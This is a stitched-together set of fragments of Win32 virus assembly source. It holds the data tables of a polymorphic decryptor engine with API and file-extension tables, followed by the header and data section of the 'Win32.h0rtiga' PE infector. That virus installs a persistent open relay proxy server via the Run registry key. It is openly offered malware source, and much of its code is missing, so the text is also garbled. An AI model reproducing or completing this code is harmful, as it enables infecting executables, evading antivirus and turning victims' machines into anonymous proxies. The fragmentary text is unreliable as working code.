xor byte ptr [ebx+REG_FLAGS],REG_READ_ONLY
mov ax,0E0FFh
or ah,byte ptr [ebx+REG_MASK]
stosw
ret
;============================================================================
;Generate CALL without return
;============================================================================
call get_rnd32
test al,01h
jz pop_with_sp
call get_valid_reg
mov al,58h
or al,byte ptr [ebx+REG_MASK]
stosb
call gen_garbage
ret
;============================================================================
;Generate unconditional jumps
;============================================================================
;============================================================================
;Generate conditional jumps
;============================================================================
;============================================================================
;Generate MOV [mem],reg
;============================================================================
ret
;============================================================================
;Generate clc/stc/cmc/cld/std
;============================================================================
;============================================================================
;Generate fake decrypt instructions
;============================================================================
call get_rnd32
call get_rnd_range
inc eax
neg eax
ok_fake_disp: mov dword ptr [ebp+fake_ptr_disp],eax
pop edx
add eax,edx
push eax
call get_valid_reg
push ebx
call GenGarbageEx ;Garbage
call fake_or_not
call GenGarbageEx ;Garbage
pop ebx
pop eax
mov byte ptr [ebp+fake_oper_size],al
shr eax,08h
mov byte ptr [ebp+fake_index_mask],ah
mov byte ptr [ebp+fake_build_flags],al
pop dword ptr [ebp+fake_crypt_key]
pop dword ptr [ebp+fake_ptr_disp]
bad_fake_size: ret
;============================================================================
;Get a ramdom reg
;============================================================================
;============================================================================
;Get a ramdom reg (avoid REG_READ_ONLY, REG_IS_COUNTER and REG_IS_INDEX)
;============================================================================
;============================================================================
;Load ecx with crypt_size / oper_size
;============================================================================
;============================================================================
;Generate polymorphic decryptor... Whats new on this poly engine?
;
;On entry:
; esi -> Pointer to code
; edi -> Where to generate polymorphic decryptor
; ecx -> Size of area to encrypt
; edx -> Entry point to code once decrypted
;On exit:
; ecx -> Decryptor size
; edi -> End of decryptor
;
;============================================================================
xor eax,eax
mov byte ptr [ebp+NumberOfDataAreas],al ;Clear # of data area
mov byte ptr [ebp+recursive_level],al ;Clear recursive
mov ecx,NUM_DA
lea edi,dword ptr [ebp+tbl_data_area] ;Init data areas
loop_init_da: stosd
stosd
loop loop_init_da
call get_valid_reg
mov al,byte ptr [ebx+REG_MASK]
mov byte ptr [ebp+index_mask],al
or byte ptr [ebx+REG_FLAGS],REG_IS_INDEX
xor eax,eax
mov ecx,00000005h
lea edi,dword ptr [ebp+style_table+00000004h]
clear_style: stosd
add edi,00000004h
loop clear_style
call get_valid_reg
mov al,byte ptr [ebx+REG_MASK]
mov byte ptr [ebp+counter_mask],al
or byte ptr [ebx+REG_FLAGS],REG_IS_COUNTER
call get_rnd32
and eax,00000001h
jz ok_disp
call get_rnd32
ok_disp: mov dword ptr [ebp+ptr_disp],eax
call get_rnd32
mov dword ptr [ebp+crypt_key],eax
call get_rnd32
mov byte ptr [ebp+build_flags],al
call get_rnd32
and al,03h
cmp al,01h
je get_size_ok
cmp al,02h
je get_size_ok
inc al
get_size_ok: mov byte ptr [ebp+oper_size],al
mov edi,dword ptr [ebp+PtrToDecrypt];Ptr to decryptor
call gen_ret
call gen_rnd_block
;============================================================
;If this is the 1st decryptor we need to save
;some regs
;============================================================
mov al,REG_READ_ONLY
mov ecx,00000004h
lea esi,dword ptr [ebp+PshPStepIndex]
DoRestorePush: push ecx
push esi
call GenInitGarbage
pop esi
lodsd
lea edx,dword ptr [ebp+eax+TblDoPush]
mov al,byte ptr [edx]
stosb
mov dl,not REG_READ_ONLY
TryToFixEBX: cmp al,053h
jne TryToFixESI
loop DoRestorePush
;============================================================
;Build the JZ/JNZ instruction (at the end of the decryptor
;loop) at runtime
;============================================================
push ebx
call GenGarbageEx
mov dword ptr [ebp+XrndFixPtr],edi
add edi,00000006h
call gen_garbage
pop ebx
call gen_garbage
;============================================================
;Generate CALLs to each routine inside garbage code
;============================================================
call get_rnd32
and al,01h
jz MutateCall
pop ebx
push edi
sub edi,dword ptr [ebp+PtrToDecrypt]
push edi
pop ecx
pop edi
ret
;============================================================================
;Poly engine initialized data
;============================================================================
;============================================================
;Register table
;
; 00h -> BYTE -> Register mask
; 01h -> BYTE -> Register flags
;============================================================
tbl_regs equ $
db 00000000b,REG_READ_ONLY ;eax
tbl_reg_ebx db 00000011b,00h ;ebx
db 00000001b,00h ;ecx
db 00000010b,00h ;edx
tbl_reg_esi db 00000110b,REG_NO_8BIT ;esi
tbl_reg_edi db 00000111b,REG_NO_8BIT ;edi
tbl_reg_ebp db 00000101b,REG_NO_8BIT ;ebp
end_regs equ $
;============================================================
;Aliases for reg table structure
;============================================================
;============================================================
;Bit aliases for reg flags
;============================================================
;============================================================
;Initial reg flags
;============================================================
tbl_startup equ $
db REG_READ_ONLY ;eax
db 00h ;ebx
db 00h ;ecx
db 00h ;edx
db REG_NO_8BIT ;esi
db REG_NO_8BIT ;edi
db REG_NO_8BIT ;ebp
;============================================================
;Code that does not disturb reg values
;============================================================
tbl_save_code equ $
clc
stc
cmc
cld
std
end_save_code equ $
;============================================================
;Generators for [reg] indexing mode
;============================================================
tbl_idx_reg equ $
dd offset xx_inc_reg
dd offset xx_dec_reg
dd offset xx_not_reg
dd offset xx_add_reg
dd offset xx_sub_reg
dd offset xx_xor_reg
;============================================================
;Generators for [reg+imm] indexing mode
;============================================================
tbl_dis_reg equ $
dd offset yy_inc_reg
dd offset yy_dec_reg
dd offset yy_not_reg
dd offset yy_add_reg
dd offset yy_sub_reg
dd offset yy_xor_reg
;============================================================
;Generators for [reg+reg] indexing mode
;============================================================
tbl_xtended equ $
dd offset zz_inc_reg
dd offset zz_dec_reg
dd offset zz_not_reg
dd offset zz_add_reg
dd offset zz_sub_reg
dd offset zz_xor_reg
;============================================================
;Generators for [reg+reg+imm] indexing mode
;============================================================
tbl_paranoia equ $
dd offset ii_inc_reg
dd offset ii_dec_reg
dd offset ii_not_reg
dd offset ii_add_reg
dd offset ii_sub_reg
dd offset ii_xor_reg
;============================================================
;Opcodes for math reg,imm
;============================================================
tbl_math_imm equ $
db 0C0h ;add
db 0C8h ;or
db 0E0h ;and
db 0E8h ;sub
db 0F0h ;xor
db 0D0h ;adc
db 0D8h ;sbb
end_math_imm equ $
;============================================================
;Magic aliases
;============================================================
;============================================================
;Magic data
;============================================================
xx_inc_reg db 0FEh
db MAGIC_CAREEBP
db 00h
db 00h
dd offset x_inc_reg_byte
dd offset x_inc_reg_word
dd offset x_inc_reg_dword
xx_dec_reg db 0FEh
db MAGIC_CAREEBP
db 08h
db 00h
dd offset x_dec_reg_byte
dd offset x_dec_reg_word
dd offset x_dec_reg_dword
xx_not_reg db 0F6h
db MAGIC_CAREEBP
db 10h
db 00h
dd offset x_not_reg_byte
dd offset x_not_reg_word
dd offset x_not_reg_dword
xx_add_reg db 80h
db MAGIC_CAREEBP
db 00h
db MAGIC_PUTKEY
dd offset x_add_reg_byte
dd offset x_add_reg_word
dd offset x_add_reg_dword
xx_sub_reg db 80h
db MAGIC_CAREEBP
db 28h
db MAGIC_PUTKEY
dd offset x_sub_reg_byte
dd offset x_sub_reg_word
dd offset x_sub_reg_dword
xx_xor_reg db 80h
db MAGIC_CAREEBP
db 30h
db MAGIC_PUTKEY
dd offset x_xor_reg_byte
dd offset x_xor_reg_word
dd offset x_xor_reg_dword
yy_inc_reg db 0FEh
db MAGIC_NOTEBP
db 80h
db MAGIC_PUTDISP
dd offset x_inc_reg_byte
dd offset x_inc_reg_word
dd offset x_inc_reg_dword
yy_dec_reg db 0FEh
db MAGIC_NOTEBP
db 88h
db MAGIC_PUTDISP
dd offset x_dec_reg_byte
dd offset x_dec_reg_word
dd offset x_dec_reg_dword
yy_not_reg db 0F6h
db MAGIC_NOTEBP
db 90h
db MAGIC_PUTDISP
dd offset x_not_reg_byte
dd offset x_not_reg_word
dd offset x_not_reg_dword
yy_add_reg db 80h
db MAGIC_NOTEBP
db 80h
db MAGIC_PUTKEY or MAGIC_PUTDISP
dd offset x_add_reg_byte
dd offset x_add_reg_word
dd offset x_add_reg_dword
yy_sub_reg db 80h
db MAGIC_NOTEBP
db 0A8h
db MAGIC_PUTKEY or MAGIC_PUTDISP
dd offset x_sub_reg_byte
dd offset x_sub_reg_word
dd offset x_sub_reg_dword
yy_xor_reg db 80h
db MAGIC_NOTEBP
db 0B0h
db MAGIC_PUTKEY or MAGIC_PUTDISP
dd offset x_xor_reg_byte
dd offset x_xor_reg_word
dd offset x_xor_reg_dword
zz_inc_reg db 0FEh
db MAGIC_CAREEBP
db 04h
db 00h
dd offset x_inc_reg_byte
dd offset x_inc_reg_word
dd offset x_inc_reg_dword
zz_dec_reg db 0FEh
db MAGIC_CAREEBP
db 0Ch
db 00h
dd offset x_dec_reg_byte
dd offset x_dec_reg_word
dd offset x_dec_reg_dword
zz_not_reg db 0F6h
db MAGIC_CAREEBP
db 14h
db 00h
dd offset x_not_reg_byte
dd offset x_not_reg_word
dd offset x_not_reg_dword
zz_add_reg db 80h
db MAGIC_CAREEBP
db 04h
db MAGIC_PUTKEY
dd offset x_add_reg_byte
dd offset x_add_reg_word
dd offset x_add_reg_dword
zz_sub_reg db 80h
db MAGIC_CAREEBP
db 2Ch
db MAGIC_PUTKEY
dd offset x_sub_reg_byte
dd offset x_sub_reg_word
dd offset x_sub_reg_dword
zz_xor_reg db 80h
db MAGIC_CAREEBP
db 34h
db MAGIC_PUTKEY
dd offset x_xor_reg_byte
dd offset x_xor_reg_word
dd offset x_xor_reg_dword
ii_inc_reg db 0FEh
db MAGIC_NOTEBP
db 84h
db MAGIC_PUTDISP
dd offset x_inc_reg_byte
dd offset x_inc_reg_word
dd offset x_inc_reg_dword
ii_dec_reg db 0FEh
db MAGIC_NOTEBP
db 8Ch
db MAGIC_PUTDISP
dd offset x_dec_reg_byte
dd offset x_dec_reg_word
dd offset x_dec_reg_dword
ii_not_reg db 0F6h
db MAGIC_NOTEBP
db 94h
db MAGIC_PUTDISP
dd offset x_not_reg_byte
dd offset x_not_reg_word
dd offset x_not_reg_dword
ii_add_reg db 80h
db MAGIC_NOTEBP
db 84h
db MAGIC_PUTKEY or MAGIC_PUTDISP
dd offset x_add_reg_byte
dd offset x_add_reg_word
dd offset x_add_reg_dword
ii_sub_reg db 80h
db MAGIC_NOTEBP
db 0ACh
db MAGIC_PUTKEY or MAGIC_PUTDISP
dd offset x_sub_reg_byte
dd offset x_sub_reg_word
dd offset x_sub_reg_dword
ii_xor_reg db 80h
db MAGIC_NOTEBP
db 0B4h
db MAGIC_PUTKEY or MAGIC_PUTDISP
dd offset x_xor_reg_byte
dd offset x_xor_reg_word
dd offset x_xor_reg_dword
;============================================================
;Reverse-code strings
;============================================================
x_inc_reg_byte db 02h,0FEh,0C8h,MAGIC_ENDSTR
x_inc_reg_word db 02h,66h,48h,MAGIC_ENDSTR
x_inc_reg_dword db 01h,48h,MAGIC_ENDSTR
x_dec_reg_byte db 02h,0FEh,0C0h,MAGIC_ENDSTR
x_dec_reg_word db 02h,66h,40h,MAGIC_ENDSTR
x_dec_reg_dword db 01h,40h,MAGIC_ENDSTR
x_not_reg_byte db 02h,0F6h,0D0h,MAGIC_ENDSTR
x_not_reg_word db 03h,66h,0F7h,0D0h,MAGIC_ENDSTR
x_not_reg_dword db 02h,0F7h,0D0h,MAGIC_ENDSTR
x_add_reg_byte db 01h,2Ch,MAGIC_ENDKEY
x_add_reg_word db 02h,66h,2Dh,MAGIC_ENDKEY
x_add_reg_dword db 01h,2Dh,MAGIC_ENDKEY
x_sub_reg_byte db 01h,04h,MAGIC_ENDKEY
x_sub_reg_word db 02h,66h,05h,MAGIC_ENDKEY
x_sub_reg_dword db 01h,05h,MAGIC_ENDKEY
x_xor_reg_byte db 01h,34h,MAGIC_ENDKEY
x_xor_reg_word db 02h,66h,35h,MAGIC_ENDKEY
x_xor_reg_dword db 01h,35h,MAGIC_ENDKEY
;============================================================
;Format for each style-table entry:
;
; 00h -> DWORD -> Address of generator
; 04h -> DWORD -> Address of generated subroutine or
; 00000000h if not yet generated
;
;============================================================
style_table equ $
dd offset gen_load_ptr
dd 00000000h
dd offset gen_load_ctr
dd 00000000h
dd offset gen_decrypt
dd 00000000h
dd offset gen_next_step
dd 00000000h
dd offset gen_next_ctr
dd 00000000h
;============================================================
;Generators for incrementing the index register
;============================================================
tbl_idx_up equ $
dd offset IdxUpWithADD
dd offset IdxUpWithSUB
dd offset IdxUpWithINC
dd offset IdxUpADDADD
dd offset IdxUpADDSUB
dd offset IdxUpSUBSUB
dd offset IdxUpSUBADD
;============================================================
;Misc generators
;============================================================
tbl_jmp_end equ $
dd offset jmpendregadd
dd offset jmpendregsub
dd offset jmpendregxor
tbl_call_step equ $
dd offset CallStepADD
dd offset CallStepSUB
dd offset CallStepXOR
TblDoFog equ $
dd offset DoFogAdd
dd offset DoFogSub
dd offset DoFogXor
NumFog equ ($-TblDoFog)/04h
TblFixFog equ $
dd offset FixFogAdd
dd offset FixFogSub
dd offset FixFogXor
;============================================================
;Generators for decrementing the index register
;============================================================
tbl_idx_down equ $
dd offset IdxDownWithADD
dd offset IdxDownWithSUB
dd offset IdxDownWithDEC
dd offset IdxDownADDADD
dd offset IdxDownADDSUB
dd offset IdxDownSUBSUB
dd offset IdxDownSUBADD
;============================================================
;Garbage code generators
;============================================================
tbl_i_g equ $
end_i_g equ $
tbl_garbage equ $
dd offset gen_save_code ;clc stc cmc cld std
dd offset g_movreg32imm ;mov reg32,imm
dd offset g_movreg16imm ;mov reg16,imm
dd offset g_movreg8imm ;mov reg8,imm
dd offset g_xchgregreg32 ;xchg reg32,reg32
dd offset g_xchgregreg16 ;xchg reg16,reg16
dd offset g_xchgregreg8 ;xchg reg8,reg8
dd offset g_movregreg32 ;mov reg32,reg32
dd offset g_movregreg16 ;mov reg16,reg16
dd offset g_movregreg8 ;mov reg8,reg8
dd offset g_inc_reg32 ;inc reg32
dd offset g_inc_reg16 ;inc reg16
dd offset g_inc_reg8 ;inc reg8
dd offset g_dec_reg32 ;dec reg32
dd offset g_dec_reg16 ;dec reg16
dd offset g_dec_reg8 ;dec reg8
dd offset g_mathregimm32 ;math reg32,imm
dd offset g_mathregimm16 ;math reg16,imm
dd offset g_mathregimm8 ;math reg8,imm
dd offset g_movzx_movsx ;movzx/movsx reg32,reg16
save_space equ $
end_garbage equ $
;============================================================
;PolyPush
;============================================================
TblDoPush equ $
pushEBX db 053h
pushESI db 056h
pushEDI db 057h
pushEBP db 055h
;============================================================
;PolyPop
;============================================================
TblDoPop equ $
popEBX db 05Dh
popESI db 05Fh
popEDI db 05Eh
popEBP db 05Bh
;============================================================================
;CRC32 of API names
;============================================================================
CRC32_IsDebugPr dd 00000000h
CRC32_RegServProc dd 00000000h
;============================================================================
;CRC32 of infectable file extensions
;============================================================================
TblCRC32szEXT equ $
CRC32_szEXE dd 00000000h
CRC32_szSCR dd 00000000h
CRC32_szCPL dd 00000000h
;============================================================================
;CRC32 of EXPLORER.EXE and USER32.DLL
;============================================================================
CRCszEXPLORER dd 00000000h
CRCszUSER32 dd 00000000h
CRCszPSAPI dd 00000000h
CRCszIMGHLP dd 00000000h
CRCszSFC dd 00000000h
;============================================================================
;Avoid some files from being infected
;============================================================================
;============================================================================
;CRC32 of AV files
;============================================================================
;============================================================================
;End of CRC32 protected area
;============================================================================
;============================================================================
;End of virus image in files
;============================================================================
;============================================================================
;Seed for random number generator
;============================================================================
rnd32_seed dd 00000000h
;============================================================================
;CRC32 lookup table
;============================================================================
;============================================================================
;KERNEL32 API's
;============================================================================
a_GetProcAddress dd 00000000h
epK32Apis equ $
a_CreateFileA dd 00000000h
a_CreateFileMappingA dd 00000000h
a_CreateProcessA dd 00000000h
a_CreateThread dd 00000000h
a_CloseHandle dd 00000000h
a_DeleteFileA dd 00000000h
a_ExitThread dd 00000000h
a_FindClose dd 00000000h
a_FindFirstFileA dd 00000000h
a_FindNextFileA dd 00000000h
a_FreeLibrary dd 00000000h
a_GetComputerNameA dd 00000000h
a_GetCurrentProcess dd 00000000h
a_GetDriveTypeA dd 00000000h
a_GetFileAttributesA dd 00000000h
a_GetLastError dd 00000000h
a_GetLocalTime dd 00000000h
a_GetLogicalDriveStringsA dd 00000000h
a_GetSystemDirectoryA dd 00000000h
a_GetVersionEx dd 00000000h
a_LoadLibraryA dd 00000000h
a_MapViewOfFile dd 00000000h
a_OpenFileMappingA dd 00000000h
a_OpenProcess dd 00000000h
a_ReadProcessMemory dd 00000000h
a_SetEndOfFile dd 00000000h
a_SetFileAttributesA dd 00000000h
a_SetFilePointer dd 00000000h
a_SetFileTime dd 00000000h
a_Sleep dd 00000000h
a_UnmapViewOfFile dd 00000000h
a_WriteProcessMemory dd 00000000h
a_IsDebuggerPresent dd 00000000h
hKERNEL32 dd 00000000h
;============================================================================
;Used to check current computer name
;============================================================================
SizeOfComputerName dd 00000000h
;============================================================================
;Buffer used on misc routines
;============================================================================
EP_Bytes dd 00000000h
;============================================================================
;End of virus virtual image
;============================================================================
;============================================================================
;Structure used by GetVersionEx
;============================================================================
system_version equ $
dwOSVersionInfoSize dd 00000000h
dwMajorVersion dd 00000000h
dwMinorVersion dd 00000000h
dwBuildNumber dd 00000000h
dwPlatformId dd 00000000h
;============================================================================
;Variables used by the Windows 9x residency routines
;============================================================================
hSnapshot dd 00000000h
ProcessEntry equ $
ProcEdwSize dd 00000000h
ProcEcntUsage dd 00000000h
ProcEth32ProcessID dd 00000000h
ProcEth32DefaultHeapID dd 00000000h
ProcEth32ModuleID dd 00000000h
ProcEcntThreads dd 00000000h
ProcEth32ParentProcessID dd 00000000h
ProcEpcPriClassBase dd 00000000h
ProcEdwFlags dd 00000000h
ProcEszExeFile db MAX_PATH dup (00h)
ModuleEntry equ $
ModEdwSize dd 00000000h
ModEth32ModuleID dd 00000000h
ModEth32ProcessID dd 00000000h
ModEGlblcntUsage dd 00000000h
ModEProccntUsage dd 00000000h
ModEmodBaseAddr dd 00000000h
ModEmodBaseSize dd 00000000h
ModEhModule dd 00000000h
ModEszModule db MAX_MODULE_NAME32+1 dup (00h)
ModEszExePath db MAX_PATH dup (00h)
;============================================================================
;Variables used by the Windows NT and Windows 2000 residency routines
;============================================================================
hProcess dd 00000000h
hModule dd 00000000h
Explorer_MZ_lfanew dd 00000000h
Explorer_FH_SizeOfOptionalHeader dw 0000h
Explorer_FH_NumberOfSections dw 0000h
Explorer_DE_Import dd 00000000h
Explorer_Hook dd 00000000h
Explorer_Patch dd 00000000h
Explorer_Init_Hook dd 00000000h
;============================================================================
;This is virus infection thread ID
;============================================================================
IF_ThreadID dd 00000000h
;============================================================================
;This is used to locate system DLL files and load them without using names,
;only by means of CRC32
;============================================================================
a_SDLL_CRC32 dd 00000000h
;============================================================================
;TOOLHELP API's (Windows 9x only)
;============================================================================
epTOOLHELPApis equ $
a_CreateToolhelp32Snapshot dd 00000000h
a_Process32First dd 00000000h
a_Process32Next dd 00000000h
a_Module32First dd 00000000h
a_Module32Next dd 00000000h
;============================================================================
;PSAPI API's (Windows NT & Windows 2000 only)
;============================================================================
epPSAPIApis equ $
a_EnumProcessModules dd 00000000h
a_EnumProcesses dd 00000000h
a_GetModuleBaseNameA dd 00000000h
a_GetModuleInformation dd 00000000h
hPSAPI dd 00000000h
;============================================================================
;IMAGEHLP APIs used to compute new image checksum
;============================================================================
epIMGHLPApis equ $
a_CheckSumMappedFile dd 00000000h
hIMGHLP dd 00000000h
;============================================================================
;SFC APIs used by the virus to avoid Windows 2000 System File Protection
;============================================================================
epSFCApis equ $
a_SfcIsFileProtected dd 00000000h
hSFC dd 00000000h
;============================================================================
;USER32 APIs ( The address is for the Ansi version if the target is running
;windows 9x or the Wide version if running windows Nt ) .
;============================================================================
epUSER32Apis equ $
a_DefWindowProc dd 00000000h
hUSER32 dd 00000000h
;============================================================================
;Handles over target files
;============================================================================
h_CreateFile dd 00000000h
h_FileMap dd 00000000h
;============================================================================
;Misc variables
;============================================================================
CurFileAttr dd 00000000h
ChecksumPE dd 00000000h
OldChecksum dd 00000000h
map_is_here dd 00000000h
FileImport dd 00000000h
ImportSH dd 00000000h
inject_offs dd 00000000h
vir_offset dd 00000000h
search_raw dd 00000000h
host_base dd 00000000h
virus_sh dd 00000000h
fix_size dd 00000000h
raw_align dd 00000000h
K32CodeStart dd 00000000h
K32CodeEnd dd 00000000h
;============================================================================
;Poly engine uninitialized data
;============================================================================
Xrnd1 dd 00000000h
XrndReg dd 00000000h
XrndFixPtr dd 00000000h
XrndMath dd 00000000h
fake_field equ $
TblStdPshP equ $
dd 00000000h
dd 00000000h
dd 00000000h
dd 00000000h
NumberOfDataAreas db 00h
;============================================================================
;SYSTEMTIME structure used by GetLocalTime
;============================================================================
local_time equ $
LT_Year dw 0000h
LT_Month dw 0000h
LT_DayOfWeek dw 0000h
LT_Day dw 0000h
LT_Hour dw 0000h
LT_Minute dw 0000h
LT_Second dw 0000h
LT_Milliseconds dw 0000h
;============================================================================
;A rect structure used in the payload
;============================================================================
WindowRect equ $
WR_left dd 00000000h
WR_top dd 00000000h
WR_right dd 00000000h
WR_bottom dd 00000000h
;============================================================================
;This is a WIN32 FindData structure used to infect files, and some
;auxiliary variables
;============================================================================
FileSizeOnDisk dd 00000000h
FatSize dd 00000000h
h_Find dd 00000000h
DirectFindData db SIZEOF_WIN32_FIND_DATA dup (00h)
;============================================================================
;Used to retrieve current, windows and system directories
;============================================================================
;============================================================================
;Used to get logical drives
;============================================================================
;============================================================================
;End of virus image in allocated memory
;============================================================================
virseg ends
end host_code
;
; Win32.h0rtiga Coded by |Zan [@deepzone.org]
;
; ©2000 DeepZone - Digital Security Center
;
; http://www.deepzone.org
;
;----------------------------------------------------------------------------
;
; Win32.Hortiga
;
;
; AVP's description
;
; - http://www.avp.ch/avpve/newexe/win32/hortiga.stm)
;
; It is a nonmemory resident parasitic Win32 virus. It searches
; for PE EXE files (Windows executables), then writes itself to
; the end of the file. To reserve a place for its code the virus
; creates a new section with the ".|Zan" name at the end of the
; file.
;
; The virus has "anonymous IP" ability. That means that a hacker
; may use infected machines as a "proxy server" sending packets
; with infected machine's IP address:
;
; IP1 IP2 IP3
; Hacker's machine -----> Infected machine -----> Target machine
;
; A hacker connects to the infected machine by using his IP
; address (IP1) and forces the infected machine to forward packets
; to the target machine, then infected machine's IP address (IP2) is
; used. Using this mechanism the hacker hides his IP address.
;
; The virus installs its "anonymous" component as stand-alone program
; using the filename SERVER.EXE. That program is created in the
; Windows system directory and registered in the auto-start registry
; key:
;
; HKLM\Software\Microsoft\Windows\CurrentVersion\Run
; h0rtiga Server = "Windir\server.exe"
;
; where "Windir" is the Windows system folder.
;
; The virus contains the text string:
;
; (c) 2000. Win9x.h0rtiga v1.0 Server activated - http://mareasvivas.cjb.net
; Coded by |Zan - izan@galaxycorp.com / izan@deepzone.org
; Who are you???
;
; This string is used as ID-text to connect to the hacker's machine
; with the server on the infected machine.
;
; -- end AVP description
;
;
; Win32.h0rtiga by |Zan
;
; h0rtiga is a simple non resident parasite. It wasn't developed
; like a traditional viruse but it finished infecting win32 machines.
;
; Originally it was proof of concept code showing win9x's risks and
; holes in a spanish whitepaper called "Win32.h0rtiga : Anonimato e
; Intrusión ".
;
; When extra code was added to patch PE files inoculating h0rtiga code
; in arbitrary files it became a virus ...
;
; h0rtiga infects adding an extra section/object called ".|Zan". It
; can infect under win9x/NT/2k but its payload only play in win9x.
;
; This runtime infector doesn't implement "modern" features like stealth,
; encryptation or polymorphism but if "classic" features like timestamp
; or file attributes.
;
; Infecting with an extra section is "hard" and it had been more
; easy adding viral code to last section but i wanted a clear, fast
; and easy uninfection so i decided the longest, primitive & hard way to
; implement.
;
; h0rtiga payload plays a single server listening on 5556 port. This
; server lets full arbitrary relay and can be handle with a generic
; h0rtiga's client. yes, that's ... now you can imagine black hats
; exploiting infected win9x machines: anonymous surfing, faking e-mails,
; bypassing IRC bans ...
;
; Code contains clear labels and a lot of EQUs and structures documenting
; viral code ...
;
;
; greetings ...
; -------------
;
; spanish sec/hack groups, ADM, beavuh, b0f, non-commercial groups ...
;
; ... and, of course VLAD & 29A
;
; i'd like to give special thanks to Bumblebee/29A (fantastic VXer).
;
; I hope that h0rtiga can be a good contribution to this fantastic 29A
; release ;)
;
;
; deep greets
; -----------
;
; ^Anuska^> If you hit one time this key we'll hack this enterprise ...
; if you hit two times we'll hack their networks ... sorry
; mouse support isn't available ;)
;
; TheWizard> Win ME is the new msoft OS version ... I hope that now it
; can handle windows ;)
;
; Nemo> next step ... mmmm ... i don't know ... hack the fix again ?
;
;
; Special greetings ...
; ---------------------
;
; Win32.h0rtiga is dedicated to Sandra ...
;
;
;----------------------------------------------------------------------------
; Win32.h0rtiga - begin virus code (w32h0rtiga.asm)
;----------------------------------------------------------------------------
;------------------------------------------------------------
;Compiler options
;------------------------------------------------------------
.386P
locals
jumps
.model flat,STDCALL
;------------------------------------------------------------
;Just to show a message on virus 1st generation
;------------------------------------------------------------
extrn MessageBoxA:PROC
extrn GetModuleHandleA:PROC
extrn ExitProcess:PROC
;----------------------------------------------------------------------------
;Data Section
;----------------------------------------------------------------------------
.data
db 0
;----------------------------------------------------------------------------
;Code Section
;----------------------------------------------------------------------------
.code
start:
;------------------------------------------------------------
;h0rtiga main
;------------------------------------------------------------
;------------------------------------------------------------
;begin h0rtiga data
;------------------------------------------------------------
FILETIME STRUC
FT_dwLowDateTime DD ?
FT_dwHighDateTime DD ?
FILETIME ENDS
WIN32_FIND_DATA STRUC
WFD_dwFileAttributes DD ?
WFD_ftCreationTime FILETIME ?
WFD_ftLastAccessTime FILETIME ?
WFD_ftLastWriteTime FILETIME ?
WFD_nFileSizeHigh DD ?
WFD_nFileSizeLow DD ?
WFD_dwReserved0 DD ?
WFD_dwReserved1 DD ?
WFD_szFileName DB MAX_PATH DUP (?)
WFD_szAlternateFileName DB 13 DUP (?)
DB 3 DUP (?)
WIN32_FIND_DATA ENDS
SIZEOF_WIN32_FIND_DATA EQU SIZE WIN32_FIND_DATA
INVALID_HANDLE_VALUE EQU -1
VER_PLATFORM_WIN32_WINDOWS EQU 1
_OSVERSIONINFO STRUCT
dwOSVersionInfoSize DD ?
dwMajorVersion DD ?
dwMinorVersion DD ?
dwBuildNumber DD ?
dwPlatformId DD ?
szCSDVersion DB 128 DUP (?)
_OSVERSIONINFO ENDS
sz_mGetProcAddr db 'GetProcAddress', 0
ddGetProcAddress dd ?
sz_mLoadLibraryA db 'LoadLibraryA', 0
ddLoadLibraryA dd ?
kernel dd ?
Counter dw ?
AddressTableVA dd ?
OrdinalTableVA dd ?
NumAPISK32 equ 21
sz_mKernel32 db 'KERNEL32', 0
TablaK32 db 'ExitProcess', 0
db 'GetVersionExA', 0
db 'FindFirstFileA', 0
db 'FindNextFileA', 0
db 'FindClose', 0
db 'CreateFileA', 0
db 'CreateFileMappingA', 0
db 'MapViewOfFile', 0
db 'UnmapViewOfFile', 0
db 'CloseHandle', 0
db 'SetFileAttributesA', 0
db 'SetFileTime', 0
db 'GetModuleHandleA', 0
db 'GetCommandLineA', 0
db 'GetSystemDirectoryA', 0
db 'ReadFile', 0
db 'WriteFile', 0
db 'SetFilePointer', 0
db 'GetCurrentProcessId', 0
db 'RegisterServiceProcess', 0
db 'GlobalAlloc', 0
addr_apis:
ddExitProcess dd ?
ddGetVersionExA dd ?
ddFindFirstFileA dd ?
ddFindNextFileA dd ?
ddFindClose dd ?
ddCreateFileA dd ?
ddCreateFileMappingA dd ?
ddMapViewOfFile dd ?
ddUnmapViewOfFile dd ?
ddCloseHandle dd ?
ddSetFileAttributesA dd ?
ddSetFileTime dd ?
ddGetModuleHandleA dd ?
ddGetCommandLineA dd ?
ddGetSystemDirectoryA dd ?
ddReadFile dd ?
ddWriteFile dd ?
ddSetFilePointer dd ?
ddGetCurrentProcessId dd ?
ddRegisterServiceProcess dd ?
ddGlobalAlloc dd ?
OSVersionInfo _OSVERSIONINFO ?
_maskExe db '*.EXE' , 0
MaxInfeccion equ 6
WinFindData WIN32_FIND_DATA ?
hFicActual dd ?
hCMapActual dd ?
newobject:
oname db ".|Zan", 0, 0, 0
virtualsize dd 0
RVA dd 0
physicalsize dd 0
physicaloffset dd 0
reserved dd 0, 0, 0
objectflags dd 0e0000060h
ObjectTableOffset dd ?
NumObjects dw ?
ObjectAlign dd ?
FileAlign dd ?
ImageSize dd ?
SizeToMap dd ?
OldEntryPointRVA dd ?
hRead dd ?
hWrite dd ?
bytes_rw dd ?
sz_exec db 260 dup (?)
sz_nserver db '\server.exe', 0
addr1 dw 2
dw 0b415h
dd ?
addr2 dw 2
dw 0000h
db 192,168,0,1
sock1 dd ?
sock2 dd ?
gotit dd ?
buffsz equ 4096
adrbuff dd ?
fd_set1 dd 1,0
fd_set2 dd 1,0
fd_set struc
no dd 0
sockh dd 0
fd_set ends
ttl dd 0,64h
semaforo db 0
countbouncer db 0
NumAPISW32 equ 10
sz_mW32 db 'WSOCK32', 0
TablaW32 db 'WSAStartup', 0
db 'socket', 0
db 'bind', 0
db 'listen', 0
db 'accept', 0
db 'connect', 0
db 'send', 0
db 'recv', 0
db 'select', 0
db 'closesocket', 0
addr_apis2:
ddWSAStartup dd ?
ddsocket dd ?
ddbind dd ?
ddlisten dd ?
ddaccept dd ?
ddconnect dd ?
ddsend dd ?
ddrecv dd ?
ddselect dd ?
ddclosesocket dd ?
NumAPISAdv32 equ 3
sz_mAdv32 db 'ADVAPI32', 0
TablaAdv32 db 'RegCreateKeyExA', 0
db 'RegSetValueExA', 0
db 'RegCloseKey', 0
addr_apis3:
ddRegCreateKeyExA dd ?
ddRegSetValueExA dd ?
ddRegCloseKey dd ?
disposition dd ?
KeyHandle dd ?
clase db 'Run', 0
claselen equ $-clase
subkey db 'Software\Microsoft\Windows\CurrentVersion\Run', 0
KeyValuelen dd ?
KeyName db 'h0rtiga Server', 0
;------------------------------------------------------------
;end h0rtiga data
;------------------------------------------------------------
GetAPIExpK32: mov edx, esi
